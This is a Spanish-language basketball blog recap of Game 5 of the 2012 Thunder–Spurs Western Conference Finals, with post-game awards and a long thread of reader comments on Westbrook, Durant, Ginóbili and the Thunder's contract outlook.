La Crónica: Las tornas giradas

05 de June de 2012 por txusma

Hace una semana los Spurs parecían intratables. 20 victorias seguidas y un juego colectivo demoledor. 2 a 0 en la final de conferencia y sus rivales bastante hacían con no ser apalizados cada partido. Una semana más tarde los tejanos están al borde de la eliminación y por primera vez este curso han perdido 3 encuentros seguidos. Así es este juego y así son los playoffs. Esa es la magia de todo esto.

Abría Popovich anoche con sorpresa. Ginobili de titular por primera vez en mucho tiempo. Podía parecer maniobra de viejo zorro. El as en la manga capaz de cambiar dinámicas y ganar series. A toro pasado se adivina menos genial y más a la desesperada. El técnico ha perdido la fe en algunos de sus secundarios y ellos parecen querer darle la razón con su rendimiento. Sin saber muy bien cómo se ha perdido una de sus principales bazas. Sin pretender cuestionar la decisión tampoco ayuda para que esa segunda unidad recupere confianza. El pez se muerde la cola.

Los Thunder han aguardado pacientes su ocasión y ahora hacen sangre. Ahora son ellos los que imponen colectivo, con una segunda unidad superior y un Harden decisivo. Westbrook controlaba a Parker. No importaba tanto la mala primera parte de Durant, 5 puntos y 1 de 7. Se iban al descanso con ventaja de 8 puntos. Extraña sensación de querer y no poder que tan poco han experimentado este año en el Alamo.

Pero de la mano de Ginobili puede ir uno a cualquier guerra. Los Spurs no llegaron a perder la fe y reaccionaron a situaciones muy críticas. Sin embargo en las segundas partes Durant se viste de Demonio de Tasmania. 22 puntos y 9 de 13. Imparable. Algunos canastones, como el clutch del tercer cuarto, que no te explicas cómo son posibles. Ni Manudo en plan ametralladora era suficiente para enjugar la ventaja.

Se llegaba 10 abajo bien entrado el último cuarto pero, como decimos, los hombres de Popovich no suelen ser de los que tiran la toalla. Pudo ser. Se palpó la remontada. Un triple increíble de Harden en una de las contadas manchas defensivas de Leonard puso la cuestión muy complicada. Aún la tuvo, cómo no, Ginobili para empatar con un triple desesperado. Tampoco esta vez. Se han lanzado 23 clutchs para empatar durante estos playoffs. Sólo Durant y Glen Davis tuvieron éxito.

Los Thunder son el primer equipo que logra ganar de visitante estas finales de conferencia. Algunos todavía dudan que el factor cancha condiciona una eliminatoria.

“Championship teams win on the road. Oklahoma City just did that.”
Popovich

PREMIOS

MVP: Noche de trío la-la-la. Kevin Durant 29 puntos, Russell Westbrook, 23 y James Harden, 20. Impresionante triple de James Harden en los últimos segundos cuando el balón más quemaba.

Rookie: A pesar de no tener un gran día anotador es justo reconocer los inmensos playoffs que está haciendo Kawhi Leonard, encargado de bailar con la más fea de todas. Anoche cogió 10 rebotes.

Sorpresa: Daequan Cook jugó 4 minutos y anotó los 3 lanzamientos que intentó. 8 puntos vitales para su equipo.

Decepción: Esta vez los secundarios de los Spurs no estuvieron muy acertados y solo se salvó Stephen Jackson de la quema. Gary Neal, por ejemplo, acabó con un 0 de 6 en tiros de campo.

Esfuerzo en vano: 34 puntos, 6 rebotes, 7 asistencias, 2 robos. Manu Ginobili celebró a lo grande su primer aparición en el quinteto titular de un partido de Playoffs. Lamentablemente falló el triple que podía haber llevado el partido a la prórroga.

Imágenes | AP Photos / Getty Images

Comenta

34 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y los Thunder tomaron El Alamo. Partidazo por todo lo alto en San Antonio. Todo estaba preparado para un 5º partido que siempre suele ser decisivo el las series a 7. Los Spurs habían dominado en San Antonio pero parecían haber perdido el paso en Oklahoma y este partido vino a confirmar las sensaciones que habíamos tenido durante los partidos en casa de los Thunder.
    De inicio Popovich sacó a Manudo en el quinteto titular. Sabía que estaba teniendo problemas para generar tiros y anotar contra la defensa cada vez más ajustada de los Thunder. Además se encontró con 2 faltas en menos de 1 minuto de Ibaka que se sentaba en el banquillo. Por él salió Collison y la verdad es que hizo un primer cuarto fenomenal. Con Durant repartiendo juego y un Westbrook más volcado en pasar que en anotar (7 asistencias en el primer tiempo) los Thunder empezaron a controlar el partido. En el segundo cuarto más de lo mismo. Unos grandes minutos de Cook daban las primeras ventajas series a los Thunder… pero los Spurs no se iban a rendir tan fácilmente.
    Entre el final del segundo y el inicio del tercero metieron un parcial 26-6 apoyados en una mucho mejor defensa, yendo agresivos a las líneas de pase y provocando los primeros momentos de desconcierto de Westbrook que empezaba a tirar más y mirar menos a los demás. Esto y otra exhibición de Manudona que las metía de todos los colores para poner a su equipo por delante.
    Sin embargo los Thunder no se pusieron nerviosos e hicieron gala de un saber estar ganado en estos años y que parece impropio de un equipo tan joven. Con un Harden que empezaba a carburar y sobre todo con un Durant que ya había cogido la manija del equipo los Thunder volvieron al partido para acabar el cuarto con buzzer-beater de Durantula que les dejaba 9 arriba. Gran defensa de Ibaka en estos minutos. Quedaba un último cuarto que resistir para OKC y Manudo se encargó de ponérselo difícil. Hasta 34 puntos se fué el bueno de Manudona, sin embargo con Harden inspirado los Thunder conseguían 13 puntos de ventaja a poco más de 4 minutos tras un 3+1 del barbas.
    Todo parecía acabado y El Alamo tomado pero los Spurs hicieron un último intento suicida. Defensa a muerte sobre Durant, dejar que se las juegue otro y transiciones con balones a Duncan. Resultado 2 pérdidas de Westbrook, 2 tiros fallados por Perkins (¡¡¡¡En qué pensaba para jugarse esos ataques!!) y los Spurs que se ponen a 2 con un 11-0 de parcial y el partido se pone al rojo. Y ahí estábamos barruntando una remontada espectacular y unos Thunder hundidos cuando va el bueno del barbas y se casca un triplazo decisivo en el último minuto. ¡Vaya crack! 5 de ventaja y partido decidido para OKC que se hacía con la victoria.
    Por los Thunder partidazo de Durant, como el otro día creando juego en la primera parte para tomar la batuta en la segunda. Enorme Harden en el clutch, empezó mal pero terminó siendo el hombre del partido metiendo los puntos más importantes. Fatal Perkins, los Thunder tuvieron la gran suerte de que fue eliminado por 6 faltas en los minutos finales (con él en cancha parcial -17 para su equipo) y mal también Westbrook que empezó bien pero acabó perdiendo muchos balones y tomando malas decisiones. Grandes aportaciones de Ibaka, Collison y Cook que dieron puntos muy importantes en diferentes momentos.
    Por los Spurs increíble partido de Ginobilli pero no pueden ganar a un equipo tan bueno con Parker a este nivel. Tras un enorme 2º partido la defensa Thunder le ha cogido la matrícula a Parker y están haciendo un gran trabajo sobre él. Duncan seleccionó muy bien sus tiros y fue un valladar en defensa pero ya no es el jugador decisivo en ataque que fue y los Thunder le contienen bastante bien. Además jugadores que han contribuido muchísimo en la fluidez del ataque Spur como Green, Neal, Splitter o Bonner están bajo mínimos. Sólo Jackson está contribuyendo y lo que a todos nos parecía una plantilla super amplia de los Spurs ahora no lo parece tanto por mérito de los Thunder que parecen ahora un equipo con más recursos… Si nos lo dicen hace una semana nos partimos de la risa.
    Ahora toda la iniciativa a pasado al lado de OKC que tiene una oportunidad histórica en el 6º para acabar con la vieja guardia y plantarse en las Finales. Sin embargo, hay que esperar un último gran esfuerzo de los Spurs por devolver el golpe a domicilio y forzar un 7º en casa. Es lo que se merecerían estas increíbles series aunque a día de hoy lo más probable parece que los Thunder finiquiten esto en casa de la mano de Durant-Harden.

      Citar

  2. Pcerezo dice:
    #2

    Joder Green Pride, podrías haber hecho tú la crónica:)

    A lo mejor me equivoco, ahora la pregunta que nos tenemos que hacer es cuántos anillos va a ganar Kevin Durant?

      Citar

  3. simon dice:
    #3

    Pcerezo:
    Joder Green Pride, podrías haber hecho tú la crónica:)

    A lo mejor me equivoco, ahora la pregunta que nos tenemos que hacer es cuántos anillos va a ganar Kevin Durant?

    Pues yo soy de los que pienso que se va a inflar. Puesto que me parece el jugador mas decisivo de la liga ( mas que James y Wade juntos ) y con el nuevo convenio ( lo mismo me equivoco ) tener al mejor va a ser todavia mas decisivo de lo que es actualmente, cuando entre el nuevo convenio laboral de la liga no muchos equipos se van a poder permitir tener 3 Superestrellas, y por eso el valor de tener un jugador decisivo va a aumentar, el problema que pueden tener viene precisamente de este convenio laboral no creo que puedan mantener muchos años a Durant,Westbrook, Harden e Ibaka, en caso de no tener potencial economico para mantenerlos para mi el sacrificado deberia de ser Westbrook y si tampoco se pueden tener 3 contratos bastante altos ( el de Ibaka lo va a ser ) pues entonces tendrian que largar tambien a Ibaka a cambio de espacio salarial.

      Citar

  4. simon dice:
    #4

    Añadir que creo que si consigue OKC el anillo este año o bien Ibaka o bien Harden se irán al no poder renovarlos.
    SI ganan el anillo estos dos jugadores pedirán mas pasta ( ya habrán ganado su anillo y ahora irán a trincar toda la pasta que puedan y si puede ser en OKC mejor pero sino cogerán su maleta y se irán ) y además OKC sin la presión de conseguir un anillo que ya han logrado intentará reducir sus gastos un poco sabiendo que aun sin Ibaka o Harden van a seguir siendo aspirantes ( con menos opciones pero aspirantes ).

      Citar

  5. GreenPride dice:
    #5

    Hola Simón, pues lo que dices sobre OKC los años próximos es simplemente imposible.
    A saber, para el año próximo tienen contrato Durant, Perkins, Harden, Ibaka, Sefolosha, Collison, Cook, Aldrich, Maynor, Jackson y Hayward. Por tanto ni Harden ni Ibaka pueden pedir más pasta para el año que viene, que la NBA para esto no es cómo el fútbol en Europa. De la columna vertebral de este año sólo acaba contrato Westbrook y Fisher, pero les quedan 11 millones libres por debajo del tope para el año que viene con lo que podrían afrontar su renovación sin pasarse mucho del tope.
    Es más, para el siguiente (2013/14) Ibaka y Harden todavía serán agentes libres restringidos por lo que podrían retenerlos también igualando ofertas.
    Por tanto a este equipo le queda todavía cuerda para rato y aunque las renovaciones serán un problema a medio plazo yo creo que les puede ir cuadrando todo por lo menos otras 2 o 3 temporadas.

      Citar

  6. Nacho dice:
    #6

    Me duele ver a Westbrook como MVP.
    Es más, yo titularía “Gana OKC a pesar de Westbrook”
    Vale que le tengo manía, pero ya lo he dicho aquí, me reafirmo y lo seguiré haciendo. Magnífico anotador, de los que te revoluciona un partido. Un tipo para jugar en cualquier equipo no aspirante. Cámbialo por Nash, y tenemos un equipo campeón sin lugar a dudas. Su último cuarto ayer fue patético. Con un Obradovic de por medio hubiese durado dos minutos. Que de gracias a Hardem, porque si no es por su triplazo se van de vacío perdiendo una desventaja de doce puntos gracias a su base. No pido ya que veamos su último cuarto. Basta repasar el PlayByPlay del 4º cuarto (donde sale mejor parado que en directo)
    Impresionantes Collison e Ibaka en defensa, éste último a pesar de las faltas y de jugar pocos minutos.
    Durant es de largo el jugador más decisivo de esta liga, aunque ayer falló un par de contras y perdió una bola en los úlitmos minutos, pero nada que ver con lo que hace su base.
    Hardem de un partido gris que clarea un poco en el último cuarto, se sale con su triplazo.
    Importantes defensa de Shefolosa también.
    Para mí la mancha de este equipo es Westbrook. Que no dudo que sea un grandísimo jugador. Pero no sabe estar, ni sabe tomar buenas decisiones, no para un equipo que espire a campeón. Los grandes saben cuando tienen a alguien más grande a su lado. Él no. Se cree la reina del baile. Y todos, menos él y su entorno lo sabemos. Falta un entrenador que lo ponga en su sitio. Y eso que el bueno de Brooks nos ha sorprendido a todos en estos tres partidos.
    Nos falta algo en los Spurs. ¿Qué? ¿Dónde se ha ido? Ahí si estoy de acuerdo con la crónica. Y el partidazo de Manu merecía ese último triple.
    Para acabar, no me gusta hablar de los árbitros, pero no me han gustado nada. Creo que jugadores como Durant y LeBron están sobreprotegidos por este colectivo. Y no creo que lo necesiten. Al menos Durant.

      Citar

  7. GreenPride dice:
    #7

    Jugando a GM, ¿Que os pareceria un sign&trade de Westbrook por Deron Williams? Crreo que ambos equipos podrían salir ganando. Los Nets conseguirían un anotador de primera y Westbrook podría tener un equipo para él en una ciudad como Nueva York mientras que los Thunder tendrían un base-base de verdad que sabe cuando meter puntos y cuando pasar el balón, con mucho mejor conocimiento del juego que Westbrook y que imagino que iría encantado a ganar títulos a OKC

      Citar

  8. Pcerezo dice:
    #8

    Green Pride, no toques lo que funcione…

      Citar

  9. Pcerezo dice:
    #9

    Lo verdaderamente jodido es ser un fan de los Sonics y ver a Oklahoma, te puedes cagar en la madre del que no quiso hacer el pabellón nuevo…menudo negocio perdido y lo que les birlaron…

      Citar

  10. GreenPride dice:
    #10

    Hombre Pcerezo, OKC funciona con Westbrook pero yo es con Deron lo veo como una máquina imparable la verdad

      Citar

  11. GreenPride dice:
    #11

    En lo de Seattle sí te doy la razón. Yo que soy un nostálgico me hubiera encantao ver a estos Thunder pero con la camiseta de los Sonics

      Citar

  12. Nacho dice:
    #12

    Yo es que creo que no haría falta tanto (por Deron). Pero vamos, si colase sería la leche. También habría que ver si D-Will encajaría. Lo perfecto para estos Thunder sería un base que defendiera como Shefolosa y que atacara como Calderón.

      Citar

  13. Jose Luis dice:
    #13

    La verdad es que me alegro, Oklahoma no es que me caiga especialmente bien pero se lo merecen, a pesar de que han ganado muchos partidos ajustados que de no ser así les hubieran planteado problemas en su camino. Pero los Spurs es que me caen fatal, me aburre verlos, y Duncan será muy bueno pero no sé, a mi no me llama la atención tampoco, y se dice que es el mejor PF de la historia, pues no sé, a mi es que no me convence, y he visto partidos suyos de principios de siglo y tampoco. Prefiero que lleguen los Thunder a las Finales tanto por buen juego como por diversión. La verdad es que me gustaban más los Spurs cuando eran defensivos.

      Citar

  14. rumbero dice:
    #14

    Ya sabía hoy que vendrias con el cuchillo entre los dientes a por Westbrook xD. Pero si, es cierto, su último cuarto ha estado a punto de costarle el partido a los Thunder. A mi es que me parece un buen jugador, y yo le veo (si amigos, lo voy a decir) “potencial” para mejorar teniendo en cuenta que es el base de un aspirante con 23 años. Es un gran anotador y un buen defensor (Parker puede dar fe), y el tio juega a 1000 revoluciones, pero muchas veces los Thunder necesitan de este alto ritmo. Por contra, suele tirar demasiado y esos cruces de cables son muy peligrosos, pero con un Obradovic que lo sentara cada vez que hiciera de las suyas bastaría, porque calidad tiene.

    Nacho:
    Lo perfecto para estos Thunder sería un base que defendiera como Shefolosa y que atacara como Calderón.

    Hombre, eso es pedir bastante e, dame el nombre de un base que cumpla esos requisitos 😀

      Citar

  15. Nacho dice:
    #15

    rumbero:
    Ya sabía hoy que vendrias con el cuchillo entre los dientes a por Westbrook xD. Pero si, es cierto, su último cuarto ha estado a punto de costarle el partido a los Thunder. A mi es que me parece un buen jugador, y yo le veo (si amigos, lo voy a decir) “potencial” para mejorar teniendo en cuenta que es el base de un aspirante con 23 años. Es un gran anotador y un buen defensor (Parker puede dar fe), y el tio juega a 1000 revoluciones, pero muchas veces los Thunder necesitan de este alto ritmo. Por contra, suele tirar demasiado y esos cruces de cables son muy peligrosos, pero con un Obradovic que lo sentara cada vez que hiciera de las suyas bastaría, porque calidad tiene.

    Hombre, eso es pedir bastante e, dame el nombre de un base que cumpla esos requisitos

    El problema es que en la NBA es más difícil pillar a un Obradovic que lo sentara que a una mezcla CaldeTabho, que ya es chungo. Por eso digo que es un tío válido para cualquier equipo en reconstrucción. Igual en 3 o 4 años puede ser referente de un aspirante. Pero a día de hoy lastra más que suma en los momentos decisivos. Es que el 4º partido también pudo joderlo, lo que pasa es que apareció un tal Durant. Que cada día me flipa más, porque no es la típica estrella tipo Juan Palomo, sino que es un tío que sabe cuando dar, y cuando ser. En eso es infinítamente superior a todos los jugadores franquicia (incluído LeBron), y además a todos les da sopas en el clutch.

      Citar

  16. Pcerezo dice:
    #16

    Lo que necesita Oklahoma es ganar el título, que están en una posición privilegiada, irse de vacaciones y volver a ganarlo el año que viene con los mismos para empezar un dinastía que están en clara disposición para hacerlo.
    Westbrook me imagino que ciertos tics los irá mejorando y se convertirán en un muy buen jugador con lo que se aprovecharán todavía más los Thunder.
    Tocar lo que funciona no creo que sea la solución.

      Citar

  17. TheDeerHunter dice:
    #17

    Me da que quieran o no tendrán que tocar lo que funciona.
    En condiciones normales no creo que puedan afrontar la renovación de Harden e Ibaka simultáneamente.

      Citar

  18. Esteban dice:
    #18

    asusta ver como juegan estos thunder, Y LOS JOVENES QUE SON!!! nueva egemonia tipo spurs parece encaminarse

    de que se disfrazaran el resto de las franquicias durante los proximos 10 años para discutirle los titulos al thunder?

    creo que durant y russell, mas o menos han tocado su techo que de por si es alto, dudo que puedan mejorar mucho mas, solo de la cabeza y la experiencia que tendran en un par de años

    pero harden, cada dia juega un poco mejor, puede ser el mejor escolta de la nba la mismisima proxima temporada

    y esta el caso de ibaka, dando algunas muetras de lo que algunos creiamos que daria este año y que no dio, aparece en PO demostrando que no le tiene mucho que envidiar a ninguna 4 joven de la liga y tiene una mecanica de tiro y una coordinacion que pueden hacer un ala pivot de verdadera elite en no mas que un par de años

    con esos 4 jugadores, que igualando ofertas, los podrian tener entre 4 y 5 temporadas mas como minimo, quien para a este equipo en el futuro?

      Citar

  19. GreenPride dice:
    #19

    Estoy contigo Esteban en que estos Thunder parecen llamados a dominar la NBA los próximos años. De hecho yo sí que creo que Durant y Westbrook todavía pueden mejorar, mira si no cómo ha madurado Durant del año pasado a este en cuanto a selección de tiro, visión de juego o defensa, tienen los dos sólo 23 años.
    Cuando se formó el Big Three de Miami ellos mismos hablaban de una dinastía y de cuantos títulos podrían ganar. Ahora la amenaza de los Thunder puede dejarles más blancos que una estera. Pueden avecinarse años en los que Heat-Thunder sea una rivalidad al estilo de las grandes de la historia de la NBA.
    Sin embargo hay que tener cuidado con todos estos pensamientos. Lesiones, algún jugador descontento u otras cosas por el estilo pueden dar al traste con equipos llamados a hacer historia. Ahí tenemos el ejemplo de los Blazers que hace 2 años parecía que iban a comerse el mundo con Roy, Aldridge, Oden y demás y míralos ahora.
    Ojalá no se tuerzan las cosas para los Thunder porque verdaderamente pueden ser un equipo que marque historia.

      Citar

  20. simon dice:
    #20

    El gran problema que veo con los Thunder es mantener su plantilla. como he dicho antes este mismo año si hay anillo uno de los dos se pira ( imagino que Ibaka ) o si se quedan los dos será pq Ibaka no le han ofrecido nada del otro mundo por ahi fuera, cosa que me extrañaria. Si buscan un traspaso por Perkins por espacio salarial y elecciones del 20 al 30 yo creo que si que podrian traspasarlo y asi acometer la renovacion de Ibaka, el problema sería buscar otro 5. Para que dominen la liga durante los proximos 10 años el GM debería de estar muy acertado pues para creo que a los 4 no los van a poder mantener mas alla de cuando entre en vigor el nuevo convenio laboral. que se verán obligados a traspasar a uno de ellos o bien a tener esos 4 y el resto plagados de contratos minimos mas la mid-level para un 5… y yo confio en KD pero esos 4 solos y rodeados de malos jugadores no van a hacer una dinastía, tendrá que hilar muy fino el GM en los próximos años al mas puro estilo Spurs, sacar mucho partido a las elecciones de final de primera ronda.

      Citar

  21. simon dice:
    #21

    Por cierto dos preguntas.
    1. Cuanto creeis que les van a dar a Harden e Ibaka?
    2. Cuanto considerais que sería su precio real?

      Citar

  22. nba dice:
    #22

    Yo creo que tanto a Harden como Ibaka , que son imprescindibles en el equipo junto con Durant y tienen margen de mejora, habria que ofrecerles algo similar al contrato deAndre Jordan de clippers, pero para estos dos totalmente merecido.
    Y luego escuchar ofertas por WestBrook, ya que aunque es un crack , en algun momento este va a montar un pollo gordo creyendose el amo de la franquicia, seguro que habría franquicias interesadas y ofrecerian algo interesante

      Citar

  23. Viva_Dirk dice:
    #23

    Veo demasiadas críticas a Westbrook y creo que os olvidais de que es un excelente defensor, algo que permite correr muchas veces al equipo y que quita responsabilidades a otros en ese aspecto. En eso los bases que habeis nombrado como son Deron y Nash son mucho mucho peores, y eso es clave para los Thunders. Para los ataques estáticos puede que Russell no sea el mejor base posible, pero teniendo a Durant y a un escolta tan inteligente como Harden no lo veo tan importante, no hay un juego interior al que surtir de balones ni tiradores puros para los que generar tiros.

    Resumiendo, creo que el mejor base posible para Oklahoma es Westbrook.

    Otras cosas que habeis comentado:

    – No creo que tengamos que pensar en cuantos anillos van a ganar, lo primero es ver si ganan este y lo segundo es ver cuantos equipos sin un juego interior que domine en ataque han ganado varios anillos, si quereis os lo digo yo, los Bulls de Jordan y los Bad Boys. Estos Thunders tienen alguna pincelada de aquellos Bulls como el juego muy agresivo sobre la linea de pase y a un tremendo defensor como Ibaka, habrá que ver si van añadiendo piezas como hizo aquel equipo, si la figura de Durant se hace lo suficientemente grande como para que no sea necesario, o si tienden al modelo de plantilla extralarga como la de los Pistons.

    – A Ibaka y Harden los van a dar una pasta y la verdad es que lo merecen. Ibaka es un defensor como yo no recuerdo en su posición, además es un currante nato y cada vez tira mejor desde la media distancia, es una pieza tremenda para un equipo ganador y con mas minutos hará numeracos. Y Harden es un anotador letal que no es un superchupón, lo cual no abunda, jugadores de un perfil como es suyo son historia viva de la liga, habrá que ver el donde se queda. Creo que ambos tendrán ofertas de 10-12 kilos con contrato multianual.

      Citar

  24. simon dice:
    #24

    Viva_Dirk:
    Veo demasiadas críticas a Westbrook y creo que os olvidais de que es un excelente defensor, algo que permite correr muchas veces al equipo y que quita responsabilidades a otros en ese aspecto. En eso los bases que habeis nombrado como son Deron y Nash son mucho mucho peores, y eso es clave para los Thunders. Para los ataques estáticos puede que Russell no sea el mejor base posible, pero teniendo a Durant y a un escolta tan inteligente como Harden no lo veo tan importante, no hay un juego interior al que surtir de balones ni tiradores puros para los que generar tiros.

    Resumiendo, creo que el mejor base posible para Oklahoma es Westbrook.

    De acuerdo en lo dicho, el único base que a mi me gustaría aun mas para OKC es Rondo, ya lo dije cuando sonaron los rumores sobre este trade en enero o asi y a mi me parecía un gran trade para OKC. Rondo anota menos pero su defensa y su capacidad de organizar son mejores que las de OKC.

      Citar

  25. Ru dice:
    #25

    Considero que Westbrook ha mejorado notablemente en su toma de decisiones,no hay más que echar la vista atrás para leer en el blog que en semis lo hizo de maravillas,ya sabéis,4 pérdidas en 5 partidos.Eso sí,en esta serie ha vuelto a sacar los fantasmas del pasado pero no por ello hay que cortar su cabeza.A principio de temporada con la disputa con Durant decía que había que traspasarlo,a día de hoy es importantísimo para los Thunder.Y está claro que puede mejorar,sigue siendo su pero la toma de decisiones,¿trabajará en ello o está ya endiosado?Creo que lo primero.Y como Westbrook todos pueden mejorar,KD en su peso defensivo/reboteador e Ibaka en su tirito.Quizás a quien veo que ha llegado a su techo es a Harden.Y como dice Viva_Dirk,10-12 millones seguro cada uno,considerando en mi opinión más importante la renovación de Ibaka que Harden.Razón,sin Ibaka agujero enorme en la zona,aunque perder a Harden es perder anotación en momentos calientes.

    Sobre el partido,habiendome perdido los dos de Oklahoma,he visto a San Antonio sin la circulación de balón de los dos primeros partidos y si han estado en éste ha sido por la inspiración de Ginóbili.Ahora mismo la sensación es que OKC finiquita la serie en casa pero las dos finales de conferencia han roto los guiones previstos y cualquiera vaticina algo.Yo les doy chances a los Spurs,pero desde luego con el juego de los primeros partidos en casa,estos experimentos de cambios de rotación a estas alturas ponen a la luz que existen dudas….

    Y como llevo diciendo mucho tiempo,asusta pensar que OKC gane el anillo esta temporada,porque hablaremos de dinastía como hace tiempo no se recuerda.Ahora mismo el aroma que dejan es superior al de los Lakers de la era Gasol,cuando llegaron los dos anillos.El problema es que me huelen a los Chicago Bulls de Jordan.Yo si fuera LeBron rezaría por ganar este año,ahora o nunca,al menos tal como está hecho el equipo de Miami.

      Citar

  26. Ru dice:
    #26

    Por cierto,una de breves:

    – Neil Oshley,hasta ahora GM de Clippers,deja el equipo angelino y se va los Portland en lo que considero una excelente decisión de la franquicia de Oregón.

    – Nahs quiere un sign & trade para que los Phoenix saquen algo en el traspaso.Lakers ejercen su TO sobre Bynum.

    – Rumores: Rudy Gay en el mercado.Hace unos días se hablaba de interés en Iguodala,en pos de tener un jugador de rol que encajara mejor en el equipo con Randolph.También hay interés en disponer de masa salarial para retener a OJ Mayo (en mi opinión imprescindible si traspasan a Gay)

      Citar

  27. Sancho88 dice:
    #27

    Bueno, llego tarde porque en estos momentos ya está en juego el Boston@Miami, pero más o menos coincido en bastantes cosas con vosotros, si bien no en todas, por supuesto. Lo primero es que me ha quedado la sensación de que OKC Thunder es el mejor equipo del mundo, y que podrían presentarse a los juegos olímpicos como equipo y llevarse el oro sin problemas, incluso compitiendo contra la selección de los Estados Unidos.

    Bien, planteábamos en la previa una batalla del presente futurible (OKC) contra el pasado con presente (SA), más o menos me entendéis lo que quiero decir, y los partidos han ido marcando la dinámica. Lo que hay es lo que hemos visto, y sí, Thunder se está pasando por la piedra al mejor equipo de la temporada regular y de los playoffs hasta el momento. Hasta que se han cruzado con los Thunder modo tercer partido de esta serie, me refiero. Compiten de maravilla. Con complicaciones contra Dllas se sobrepusieron, igual contra Lakers, y ahora se sobreponen a un 2-0, algo que no ha sucedido más que en una quincena de ocasiones, si mal no recuerdo o he leído por ahí. Y además, que cada día crecen como equipo, hacen cosas nuevas en defensa, donde rotan como si fueran un equipo de voleibol, con maravillosos cambios de marca, y atacan imitando a los mejores Spurs de la racha 20genaria.

    @Nacho. No estoy de acuerdo con tu valoración sobre la aportación de Westbrook en la serie, o en el partido de anoche si queremos particularizar. Se comió a Parker con patatas en todos los aspectos, sobre todo en la primera parte. Además, reclamábamos que jugara con cabeza y buscara a sus compañeros. Eso, unido a una defensa valiosísima sobre Parker, valiéndose de la ayuda de Sefolosha, es justamente lo que hizo. Llegaba al ataque, se paraba, amenazaba, pasaba buscando a sus compañeros. Excelentes conexiones por momentos con Ibaka y Durant. Implicó a todos los jugadores, y eso que Durántula estaba fatal en la primera parte. Fue el alma de los Thunder para levantarse, aparte de Durant lógicamente.

    En serio, si pone la cabeza en su sitio, puede llegar a ser mejor que Rondo. No son comparables, pero yo diría que el conjunto de potencia-explosividad-tiro exterior-defensa y posible buena y constante lectura de juego a medio plazo no lo tiene ningún base en la liga, ni siquiera Rose o el propio Rondo. Tiene todos los ingredientes para llegar a ser un base superlativo, diferente a todo lo que hemos conocido. Yo nunca había visto un base como Westbrook, y lo mismo digo, o parecido con Rondo. Son una evolución brutal por físico, talento, potencia y defensa. Lo tienen todo todo, aunque Rondo es más director y Westbrook más pasional y anotador, lo cual no quiere decir que ya está mejorando bastante su visión de juego y en esta faceta tiene posibilidades infinitas.

    No obstante, en el resumen de la serie tiene algunas perlas dedicadas de mi puño y letra, jeje. Pero que quede claro que pienso de él auténticas maravillas en realidad. Entre él y Rondo me están haciéndolo flipar totalmente en estos Playoffs.

    Conclusión: Los viejos van a caer en el sexto por aplastamiento. Hasta aquí han llegado. Cuando te encuentras con un equipo que te va a imitar, que parece que han activado el modo Dinastía y acojonan para los próximos diez años…. poco se puede hacer.

    Conclusión 2: Fake total lo de los ‘Beach Boys’. Parece que la maldición de Dan Gilbert se va a cumplir, porque no les veo yo a estos Heat, jugando como juegan, totalmente a arreones, poder ganarles más de un partido en condiciones normales a estos Thunder.

    Conclusión 3: Lo de los salarios es movida mayor del reino. Ahí sí que soy ignorante total y mi valoración no es para nada valiosa. Solo espero que puedan seguir juntos muchos años para hacernos disfrutar.

    Me parece que desde ya y hasta 2020, OKC son invencibles. VIVA EL BASKET!!

      Citar

  28. Sancho88 dice:
    #28

    Confirmo el dato, solo 14 equipos en toda la historia habían levantado un 2-0 en una eliminatoria de los Playoffs. Parece que los Thunder serán el 15º

      Citar

  29. Sancho88 dice:
    #29

    Ah, y aclaración sobre el partido de anoche de Westbrook. Destaco que fue clave para los arreones, para el gran parcial desde el 56-62 en contra hasta el 81-72 a favor, pero también he de decir que en el cuarto periodo es cuando yo le dedicaré bastantes ‘lindezas’ en el resumen. Puso el modo regular season y empezó a cagarlas, pero ni mucho menos le corresponde a él el demérito de perder esa ventaja con el 101-88 hasta el 101-99. Fue todo una mezcla de que resucitaron Parker&Duncan, que el Álamo rugía, que los árbitros se lo daban todo a los Spurs, que no se pita la falta clarísima de Leonard sobre Sefolosha, los pasos de ballet clásico de Manu, etc. etc. Si hubieran remontado Spurs todos estos factores entrarían en el paquete, y no solo las cagadas típicas de Westbrook, que, repito, se compensan totalmente con su gran partido hasta ese momento. En serio, estuvo superlativo. Primeros dos partidos, Parker domina y ganan Spurs. Tercero, cuarto y quinto, Westbrook juega más reflexivo y para sus compañeros en general, y ganan los Thunder. Sería un análisis muy simplista, pero tiene bastante de realidad. Si Westbrook no hubiera defendido en estos tres partidos como lo ha hecho, ahora la serie iría 3-2 para Spurs o quizá ya habría terminado 4-1.

    Durant ya sabíamos que iba a hacer lo que está haciendo, porque es un jugador igual de glorioso que James, pero Westbrook está jugando a un nivel que nadie esperaba. Se le podrá criticar, efectivamente, pero yo le diría a Popovic qué le parece la serie que está jugando Westbrook. Fijo que no le deja dormir. Las ojeras de este señor ya son terribles, y el pequeñajo número 0 tiene que aparecer en todas sus pesadillas sí o sí

      Citar

  30. Sancho88 dice:
    #30

    Y por cierto, y con esto cierro post por esta noche, o eso creo, TXUS!! TERRIBILÍSIMO RESUMEN JODER. Que nadie te lo ha dicho pero es la jodida verdad. Totalmente acertado, y en general, tanto a ti como a Deer, mil gracias porque en estas últimas semanas se os ha multiplicado el curro en el blog, sin los findes de descanso si quiera. Aquí estáis siempre al pie del cañón madrugada tras madrugada, y eso tiene mucho mérito. GRACIAS ETERNAS, ME ENCANTA EL BLOG.

    menstruación mode: ON, 😀

      Citar

  31. Lucho dice:
    #31

    Terrible victoria de los Celtics en el AAA!!! Que corazon que tienen!!
    En el ultimo minuto, el viejo big three se puso nervioso para cerrar el partido: Peirce con un terrible triple y Allen y Garnett perfecto en los libres.
    Gran partido de KG. Me gusto mucho Pietrus, cada vez esta siendo mas importante

      Citar

  32. simon dice:
    #32

    Sancho88:
    Confirmo el dato, solo 14 equipos en toda la historia habían levantado un 2-0 en una eliminatoria de los Playoffs. Parece que los Thunder serán el 15º

    Y Boston el 16. Increibles finales de conferencia las que estamos viendo. Por cierto aunque yo siempre he sido de sus mayores defensores y de los que mas paciencia he tenido con James para mi este año ya la está agotando toda, comenzó el ultimo cuarto con dos o tres canastas seguidas y a partir de ahi en los ultimos 8 minutos lanzo 4 o 5 veces y solo metió una ( eso si cuando quedaba un minuto ) y si no recuerdo mal no cogió ni un rebote ni lo recuerdo dando una asistencia en esos minutos finales, es como si hubiera desaparecido del partido, creo que la presión le puede, tanta caña que se le ha dado con que es un mal jugador en el clutch y yo creo sinceramente que ya nunca superará ese estigma que lleva con el….

